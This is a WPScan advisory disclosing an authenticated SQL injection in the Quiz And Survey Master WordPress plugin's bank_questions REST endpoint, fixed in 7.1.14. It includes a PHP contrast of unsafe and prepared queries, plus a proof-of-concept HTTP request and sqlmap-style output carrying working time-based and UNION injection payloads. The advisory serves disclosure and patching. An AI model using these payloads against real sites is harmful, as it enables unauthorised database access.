WPScan

WordPress Plugin Vulnerabilities

Quiz And Survey Master < 7.1.14 - Authenticated SQL injection via Rest API

Description

While confirming https://wpscan.com/vulnerability/3b52b25c-82a1-41c7-83ac-92e244f7c5ab, another SQLi issue was identified and reported. The qsm_rest_get_bank_questions() function in the php/rest-api.php file did not properly sanitise and escape the category parameter before using it in SQL statements passed to the get_row() and get_results() DB calls, allowing users with the edit_post capability (author+) to perform SQL injections.

Other SQLi issues were also identified by the WordPress plugin team.
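The pattern described above, shown as an added illustration that is not the plugin's own code nor its actual fix: a hypothetical REST callback concatenates the untrusted category parameter into a query, and the hardened variant binds it through $wpdb->prepare(). The route name, callback names, table name ({$wpdb->prefix}example_questions) and column names are assumptions chosen for the example; the real qsm_rest_get_bank_questions() and its schema are not reproduced here.

```php
<?php
// Added example, not code from the Quiz And Survey Master plugin.
// Table and column names below are hypothetical.

// Vulnerable pattern: the raw request parameter becomes part of the SQL text,
// so a value such as  a' AND (SELECT SLEEP(5))--  changes the query structure
// instead of being compared as a string.
function example_bank_questions_unsafe( WP_REST_Request $request ) {
    global $wpdb;
    $category = $request->get_param( 'category' ); // untrusted, unescaped
    $sql      = "SELECT id, question_name FROM {$wpdb->prefix}example_questions"
              . " WHERE category = '" . $category . "'";
    return $wpdb->get_results( $sql );
}

// Hardened pattern: $wpdb->prepare() binds the value through a %s placeholder,
// so whatever the caller sends is treated as data, never as SQL syntax.
// Table names cannot be bound, so the table is still built from the trusted
// $wpdb->prefix and a fixed literal, not from request input.
function example_bank_questions_safe( WP_REST_Request $request ) {
    global $wpdb;
    $category = sanitize_text_field( (string) $request->get_param( 'category' ) );
    $sql      = $wpdb->prepare(
        "SELECT id, question_name FROM {$wpdb->prefix}example_questions WHERE category = %s",
        $category
    );
    return $wpdb->get_results( $sql );
}

// Route registration for the hardened callback. The permission_callback limits
// who can reach the endpoint at all; it is defence in depth and does not by
// itself fix an injection, which is why prepare() above is still required.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/bank_questions', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_bank_questions_safe',
        'permission_callback' => function () {
            return current_user_can( 'edit_posts' );
        },
        'args'                => array(
            'category' => array(
                'type'              => 'string',
                'required'          => true,
                'sanitize_callback' => 'sanitize_text_field',
            ),
        ),
    ) );
} );
```

The sanitize_callback in the route args strips tags and control characters but is not an escaping step; only prepare() (or an equivalent parameterised call) prevents the parameter from altering the query, which is the defect the advisory describes for get_row() and get_results().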

Proof of Concept

GET /wp-json/quiz-survey-master/v1/bank_questions/1?category=a'%20AND%20(SELECT%201950%20FROM%20(SELECT(SLEEP(5)))ckOq)--%20IYpy HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-WP-Nonce: 2d1236068d
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [account with edit_post capability (author+)]


---
Parameter: category (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=a' AND (SELECT 1950 FROM (SELECT(SLEEP(5)))ckOq)-- IYpy

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: category=a' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7871,0x4c65426b7873415142526c6e6c726a61504b4976786f5a7850744a6a78527a69667a486964675262,0x7176786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 

Affects Plugins

quiz-master-next
Fixed in version 7.1.14

References

URL
https://plugins.trac.wordpress.org/changeset/2503364/quiz-master-next

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID
ee90f784-f17b-4268-9443-8f29e58d2ee1

Timeline

Publicly Published

2021-03-26

Added

2021-03-26

Last Updated

2021-03-26
